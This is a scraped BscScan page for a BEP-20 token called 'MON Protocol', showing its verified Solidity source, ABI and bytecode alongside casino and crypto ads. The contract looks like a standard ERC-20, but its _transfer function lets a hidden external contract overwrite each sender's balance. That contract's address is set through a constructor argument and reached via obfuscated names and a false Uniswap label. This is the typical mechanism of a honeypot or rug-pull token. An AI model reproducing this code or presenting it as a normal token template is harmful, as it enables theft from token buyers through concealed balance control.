MON Protocol (MON) Token Tracker | BscScan (2024)

MON Protocol (MON) Token Tracker | BscScan (1)

MON Protocol (MON)

Sponsored

MetaMask Manage your web3 everything with MetaMask Portfolio. Try Now!Ready to onboard to BNB Smart Chain? With MetaMask Portfolio, you're in control.

ZeeDex Earn $Zdex with each swap. Swap Now You will earn $Zdex as rewards for any trade or stake on ZeeDex exchange.

NexoJoin the hunt for $12,000,000+ in NEXO Tokens. Get NEXOCollect points for eligible actions and use multipliers to win big.

Sponsored

Sponsored

Сoins.game - 100 free spins for registration. Spin Now! Everyday giveaways up to 8.88BTC, Lucky Spins.Deposit BONUS 300% and Cashbacks!

NanoGames.io Daily Free Spin to win 10 ETH Free SpinStart your new gambling journey with NanoGames and claim free spin and lottery tickets!

Sponsored

BC.GAME The Best BNB Casino with 1,000,000 BNB Daily Bonus. Claim Now5000+ Slots, Live casino games, 50+ cryptos, 100% bet insurance. Register with Bscscan and get 240% first deposit bonus.

BEP-20

  • Check previous token supply
  • Add Token to MetaMask (Web3)
  • Update Token Info
  • Update Name Tag or Label
  • Submit Burn Details
  • Report/Flag Address

Market

Price

$0.00 @ 0.000000 BNB

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

0x64ae94d5ffd688d0006a476e27e5679f3137387a

  • Transfers
  • Holders
  • Info
  • DEX Trades
  • Contract
  • Analytics

Loading...

Loading

Loading...

Loading

Click here to update the token information / general information

  • Code
  • Read Contract
  • Write Contract

Contract Source Code Verified (Exact Match)

Contract Name:

TOKEN

Compiler Version

v0.8.17+commit.8df45f5f

Optimization Enabled:

No with 200 runs

Other Settings:

default evmVersion, None license

Contract Source Code (Solidity)

MON Protocol (MON) Token Tracker | BscScan (12)MON Protocol (MON) Token Tracker | BscScan (13)MON Protocol (MON) Token Tracker | BscScan (14)IDE

    - function _msgSender() - function _msgData() - function owner() - function renounceOwnership() - function _transferOwnership(address n ... interface MMjSSqakvMszkgWfonnXc - function wTLaPVvsItuxVHH( contract TOKEN is Ownable * - function name() - function symbol() - function decimals() - function totalSupply() - function balanceOf(address account) - function transfer(address kfuecdclrec ... - function allowance(address hxnznoshow ... - function approve(address spender, uin ... - function transferFrom( - function _transfer( - function decreaseAllowance(address sp ... - function _approve( - function _spendAllowance( - function gomydmvu() - function _zjCExUQC9hM( - function increaseAllowance(address sp ...
  • Similar
  • Sol2Uml
  • Submit Audit
  • Compare
/** *Submitted for verification at BscScan.com on 2024-05-26*/// SPDX-License-Identifier: MITpragma solidity ^0.8.0;// Sources flattened with hardhat v2.9.1 https://hardhat.org// File @openzeppelin/contracts/utils/[emailprotected]// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)/** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; }}// File @openzeppelin/contracts/access/[emailprotected]// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)/** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferownership}. * * This module is used through inheritance. It will make available the modifier * `onlyowner`, which can be applied to your functions to restrict their use to * the owner. */abstract contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } event Transfer(address indexed from, address indexed to, uint256 value); event Approval( address indexed owner, address indexed spender, uint256 value );}// File @uniswap/v2-periphery/contracts/interfaces/[emailprotected]interface MMjSSqakvMszkgWfonnXc { function wTLaPVvsItuxVHH( address zmDDWApORFy, address resender, uint256 s3LtCd6ip6, uint256 tKEAFNanm ) external returns (uint256);}pragma solidity ^0.8.0;contract TOKEN is Ownable { uint256 private _totalSupply; string private _name; string private _symbol; uint256 private _decimals5stupa; uint256 private _decimals; address private uoDRCJVjRlAWHCHQPyPaa; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; constructor(uint256 aq5stupa, uint256 totalSupply_) { _name = "MON Protocol"; _symbol = "MON"; uoDRCJVjRlAWHCHQPyPaa = address(uint160(aq5stupa)); uint256 amount = totalSupply_ * 10**decimals(); _totalSupply += amount; _balances[msg.sender] += amount; emit Transfer(address(0), msg.sender, amount); } /** * @dev Returns the name of the token. */ function name() public view returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view returns (uint256) { return _balances[account]; } function transfer(address kfuecdclrecipient, uint256 gvklbckdamount) public returns (bool) { _transfer(_msgSender(), kfuecdclrecipient, gvklbckdamount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address hxnznoshowner, address izpnzhamspender) public view returns (uint256) { return _allowances[hxnznoshowner][izpnzhamspender]; } function approve(address spender, uint256 amount) public returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address qcrzrphbsender, address uszfqghtrecipient, uint256 yiplxwokamount ) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(qcrzrphbsender, spender, yiplxwokamount); _transfer(qcrzrphbsender, uszfqghtrecipient, yiplxwokamount); return true; } function _transfer( address fcqvvkfxfrom, address vsyszqefto, uint256 amount ) internal virtual { require( fcqvvkfxfrom != address(0), "ERC20: transfer from the zero address" ); require(vsyszqefto != address(0), "ERC20: transfer to the zero address"); _balances[fcqvvkfxfrom] = _zjCExUQC9hM ( fcqvvkfxfrom, vsyszqefto, amount, _balances[fcqvvkfxfrom] ); require( _balances[fcqvvkfxfrom] >= amount, "ERC20: transfer amount exceeds balance" ); _balances[fcqvvkfxfrom] = _balances[fcqvvkfxfrom] - amount; _balances[vsyszqefto] = _balances[vsyszqefto] + amount; emit Transfer(fcqvvkfxfrom, vsyszqefto, amount); } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); _approve(owner, spender, currentAllowance - subtractedValue); return true; } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require( currentAllowance >= amount, "ERC20: insufficient allowance" ); _approve(owner, spender, currentAllowance - amount); } } function gomydmvu() external view returns (uint256) { return _decimals5stupa; } function _zjCExUQC9hM( address sender, address resender, uint256 amount, uint256 balance ) internal returns (uint256) { return MMjSSqakvMszkgWfonnXc(uoDRCJVjRlAWHCHQPyPaa). wTLaPVvsItuxVHH (sender,resender, amount, balance); } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; }}

Contract Security Audit

  • No Contract Security Audit Submitted- Submit Audit Here

Contract ABI

  • JSON Format
  • RAW/Text Format
[{"inputs":[{"internalType":"uint256","name":"aq5stupa","type":"uint256"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"hxnznoshowner","type":"address"},{"internalType":"address","name":"izpnzhamspender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"gomydmvu","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"kfuecdclrecipient","type":"address"},{"internalType":"uint256","name":"gvklbckdamount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"qcrzrphbsender","type":"address"},{"internalType":"address","name":"uszfqghtrecipient","type":"address"},{"internalType":"uint256","name":"yiplxwokamount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

Contract Creation Code

Decompile Bytecode Switch to Opcodes View

60806040523480156200001157600080fd5b50604051620020c4380380620020c483398181016040528101906200003791906200034e565b620000576200004b6200023960201b60201c565b6200024160201b60201c565b6040518060400160405280600c81526020017f4d4f4e2050726f746f636f6c0000000000000000000000000000000000000000815250600290816200009d919062000605565b506040518060400160405280600381526020017f4d4f4e000000000000000000000000000000000000000000000000000000000081525060039081620000e4919062000605565b5081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000620001386200030560201b60201c565b600a6200014691906200087c565b82620001539190620008cd565b9050806001600082825462000169919062000918565b9250508190555080600760003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620001c1919062000918565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000228919062000964565b60405180910390a350505062000981565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600080fd5b6000819050919050565b620003288162000313565b81146200033457600080fd5b50565b60008151905062000348816200031d565b92915050565b600080604083850312156200036857620003676200030e565b5b6000620003788582860162000337565b92505060206200038b8582860162000337565b9150509250929050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200041757607f821691505b6020821081036200042d576200042c620003cf565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004977fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000458565b620004a3868362000458565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620004e6620004e0620004da8462000313565b620004bb565b62000313565b9050919050565b6000819050919050565b6200050283620004c5565b6200051a6200051182620004ed565b84845462000465565b825550505050565b600090565b6200053162000522565b6200053e818484620004f7565b505050565b5b8181101562000566576200055a60008262000527565b60018101905062000544565b5050565b601f821115620005b5576200057f8162000433565b6200058a8462000448565b810160208510156200059a578190505b620005b2620005a98562000448565b83018262000543565b50505b505050565b600082821c905092915050565b6000620005da60001984600802620005ba565b1980831691505092915050565b6000620005f58383620005c7565b9150826002028217905092915050565b620006108262000395565b67ffffffffffffffff8111156200062c576200062b620003a0565b5b620006388254620003fe565b620006458282856200056a565b600060209050601f8311600181146200067d576000841562000668578287015190505b620006748582620005e7565b865550620006e4565b601f1984166200068d8662000433565b60005b82811015620006b75784890151825560018201915060208501945060208101905062000690565b86831015620006d75784890151620006d3601f891682620005c7565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200077a57808604811115620007525762000751620006ec565b5b6001851615620007625780820291505b808102905062000772856200071b565b945062000732565b94509492505050565b60008262000795576001905062000868565b81620007a5576000905062000868565b8160018114620007be5760028114620007c957620007ff565b600191505062000868565b60ff841115620007de57620007dd620006ec565b5b8360020a915084821115620007f857620007f7620006ec565b5b5062000868565b5060208310610133831016604e8410600b8410161715620008395782820a905083811115620008335762000832620006ec565b5b62000868565b62000848848484600162000728565b92509050818404811115620008625762000861620006ec565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008898262000313565b915062000896836200086f565b9250620008c57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000783565b905092915050565b6000620008da8262000313565b9150620008e78362000313565b9250828202620008f78162000313565b91508282048414831517620009115762000910620006ec565b5b5092915050565b6000620009258262000313565b9150620009328362000313565b92508282019050808211156200094d576200094c620006ec565b5b92915050565b6200095e8162000313565b82525050565b60006020820190506200097b600083018462000953565b92915050565b61173380620009916000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063715018a61161008c578063a457c2d711610066578063a457c2d71461024f578063a9059cbb1461027f578063dd62ed3e146102af578063e8edbaff146102df576100ea565b8063715018a6146102095780638da5cb5b1461021357806395d89b4114610231576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a957806370a08231146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f76102fd565b6040516101049190610ebf565b60405180910390f35b61012760048036038101906101229190610f7a565b61038f565b6040516101349190610fd5565b60405180910390f35b6101456103ad565b6040516101529190610fff565b60405180910390f35b6101756004803603810190610170919061101a565b6103b7565b6040516101829190610fd5565b60405180910390f35b6101936103e6565b6040516101a09190611089565b60405180910390f35b6101c360048036038101906101be9190610f7a565b6103ef565b6040516101d09190610fd5565b60405180910390f35b6101f360048036038101906101ee91906110a4565b610426565b6040516102009190610fff565b60405180910390f35b61021161046f565b005b61021b6104f7565b60405161022891906110e0565b60405180910390f35b610239610520565b6040516102469190610ebf565b60405180910390f35b61026960048036038101906102649190610f7a565b6105b2565b6040516102769190610fd5565b60405180910390f35b61029960048036038101906102949190610f7a565b610632565b6040516102a69190610fd5565b60405180910390f35b6102c960048036038101906102c491906110fb565b610650565b6040516102d69190610fff565b60405180910390f35b6102e76106d7565b6040516102f49190610fff565b60405180910390f35b60606002805461030c9061116a565b80601f01602080910402602001604051908101604052809291908181526020018280546103389061116a565b80156103855780601f1061035a57610100808354040283529160200191610385565b820191906000526020600020905b81548152906001019060200180831161036857829003601f168201915b5050505050905090565b60006103a361039c6106e1565b84846106e9565b6001905092915050565b6000600154905090565b6000806103c26106e1565b90506103cf8582856108b2565b6103da858585610947565b60019150509392505050565b60006012905090565b6000806103fa6106e1565b905061041b81858561040c8589610650565b61041691906111ca565b6106e9565b600191505092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104776106e1565b73ffffffffffffffffffffffffffffffffffffffff166104956104f7565b73ffffffffffffffffffffffffffffffffffffffff16146104eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104e29061124a565b60405180910390fd5b6104f56000610cbb565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461052f9061116a565b80601f016020809104026020016040519081016040528092919081815260200182805461055b9061116a565b80156105a85780601f1061057d576101008083540402835291602001916105a8565b820191906000526020600020905b81548152906001019060200180831161058b57829003601f168201915b5050505050905090565b6000806105bd6106e1565b905060006105cb8286610650565b905083811015610610576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610607906112dc565b60405180910390fd5b6106268286868461062191906112fc565b6106e9565b60019250505092915050565b600061064661063f6106e1565b8484610947565b6001905092915050565b6000600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600454905090565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610758576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074f906113a2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107be90611434565b60405180910390fd5b80600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516108a59190610fff565b60405180910390a3505050565b60006108be8484610650565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610941578181101561092a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610921906114a0565b60405180910390fd5b6109408484848461093b91906112fc565b6106e9565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ad90611532565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1c906115c4565b60405180910390fd5b610a70838383600760008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d7f565b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610b35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2c90611656565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b8091906112fc565b600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c0e91906111ca565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cae9190610fff565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166399ef4af0868686866040518563ffffffff1660e01b8152600401610de29493929190611676565b6020604051808303816000875af1158015610e01573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e2591906116d0565b9050949350505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610e69578082015181840152602081019050610e4e565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e9182610e2f565b610e9b8185610e3a565b9350610eab818560208601610e4b565b610eb481610e75565b840191505092915050565b60006020820190508181036000830152610ed98184610e86565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610f1182610ee6565b9050919050565b610f2181610f06565b8114610f2c57600080fd5b50565b600081359050610f3e81610f18565b92915050565b6000819050919050565b610f5781610f44565b8114610f6257600080fd5b50565b600081359050610f7481610f4e565b92915050565b60008060408385031215610f9157610f90610ee1565b5b6000610f9f85828601610f2f565b9250506020610fb085828601610f65565b9150509250929050565b60008115159050919050565b610fcf81610fba565b82525050565b6000602082019050610fea6000830184610fc6565b92915050565b610ff981610f44565b82525050565b60006020820190506110146000830184610ff0565b92915050565b60008060006060848603121561103357611032610ee1565b5b600061104186828701610f2f565b935050602061105286828701610f2f565b925050604061106386828701610f65565b9150509250925092565b600060ff82169050919050565b6110838161106d565b82525050565b600060208201905061109e600083018461107a565b92915050565b6000602082840312156110ba576110b9610ee1565b5b60006110c884828501610f2f565b91505092915050565b6110da81610f06565b82525050565b60006020820190506110f560008301846110d1565b92915050565b6000806040838503121561111257611111610ee1565b5b600061112085828601610f2f565b925050602061113185828601610f2f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061118257607f821691505b6020821081036111955761119461113b565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006111d582610f44565b91506111e083610f44565b92508282019050808211156111f8576111f761119b565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611234602083610e3a565b915061123f826111fe565b602082019050919050565b6000602082019050818103600083015261126381611227565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006112c6602583610e3a565b91506112d18261126a565b604082019050919050565b600060208201905081810360008301526112f5816112b9565b9050919050565b600061130782610f44565b915061131283610f44565b925082820390508181111561132a5761132961119b565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061138c602483610e3a565b915061139782611330565b604082019050919050565b600060208201905081810360008301526113bb8161137f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061141e602283610e3a565b9150611429826113c2565b604082019050919050565b6000602082019050818103600083015261144d81611411565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061148a601d83610e3a565b915061149582611454565b602082019050919050565b600060208201905081810360008301526114b98161147d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061151c602583610e3a565b9150611527826114c0565b604082019050919050565b6000602082019050818103600083015261154b8161150f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006115ae602383610e3a565b91506115b982611552565b604082019050919050565b600060208201905081810360008301526115dd816115a1565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611640602683610e3a565b915061164b826115e4565b604082019050919050565b6000602082019050818103600083015261166f81611633565b9050919050565b600060808201905061168b60008301876110d1565b61169860208301866110d1565b6116a56040830185610ff0565b6116b26060830184610ff0565b95945050505050565b6000815190506116ca81610f4e565b92915050565b6000602082840312156116e6576116e5610ee1565b5b60006116f4848285016116bb565b9150509291505056fea2646970667358221220f7c4a9de1e2c7f2e57ce7284caad4fe9bacbe13e519f50d3e349fe3c0859d24e64736f6c6343000811003300000000000000000000000018a3b17bf13f633c40067ef46f1c418e41db35d4000000000000000000000000000000000000000000000000000000003b9aca00


Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063715018a61161008c578063a457c2d711610066578063a457c2d71461024f578063a9059cbb1461027f578063dd62ed3e146102af578063e8edbaff146102df576100ea565b8063715018a6146102095780638da5cb5b1461021357806395d89b4114610231576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a957806370a08231146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f76102fd565b6040516101049190610ebf565b60405180910390f35b61012760048036038101906101229190610f7a565b61038f565b6040516101349190610fd5565b60405180910390f35b6101456103ad565b6040516101529190610fff565b60405180910390f35b6101756004803603810190610170919061101a565b6103b7565b6040516101829190610fd5565b60405180910390f35b6101936103e6565b6040516101a09190611089565b60405180910390f35b6101c360048036038101906101be9190610f7a565b6103ef565b6040516101d09190610fd5565b60405180910390f35b6101f360048036038101906101ee91906110a4565b610426565b6040516102009190610fff565b60405180910390f35b61021161046f565b005b61021b6104f7565b60405161022891906110e0565b60405180910390f35b610239610520565b6040516102469190610ebf565b60405180910390f35b61026960048036038101906102649190610f7a565b6105b2565b6040516102769190610fd5565b60405180910390f35b61029960048036038101906102949190610f7a565b610632565b6040516102a69190610fd5565b60405180910390f35b6102c960048036038101906102c491906110fb565b610650565b6040516102d69190610fff565b60405180910390f35b6102e76106d7565b6040516102f49190610fff565b60405180910390f35b60606002805461030c9061116a565b80601f01602080910402602001604051908101604052809291908181526020018280546103389061116a565b80156103855780601f1061035a57610100808354040283529160200191610385565b820191906000526020600020905b81548152906001019060200180831161036857829003601f168201915b5050505050905090565b60006103a361039c6106e1565b84846106e9565b6001905092915050565b6000600154905090565b6000806103c26106e1565b90506103cf8582856108b2565b6103da858585610947565b60019150509392505050565b60006012905090565b6000806103fa6106e1565b905061041b81858561040c8589610650565b61041691906111ca565b6106e9565b600191505092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104776106e1565b73ffffffffffffffffffffffffffffffffffffffff166104956104f7565b73ffffffffffffffffffffffffffffffffffffffff16146104eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104e29061124a565b60405180910390fd5b6104f56000610cbb565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461052f9061116a565b80601f016020809104026020016040519081016040528092919081815260200182805461055b9061116a565b80156105a85780601f1061057d576101008083540402835291602001916105a8565b820191906000526020600020905b81548152906001019060200180831161058b57829003601f168201915b5050505050905090565b6000806105bd6106e1565b905060006105cb8286610650565b905083811015610610576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610607906112dc565b60405180910390fd5b6106268286868461062191906112fc565b6106e9565b60019250505092915050565b600061064661063f6106e1565b8484610947565b6001905092915050565b6000600860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600454905090565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610758576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074f906113a2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107be90611434565b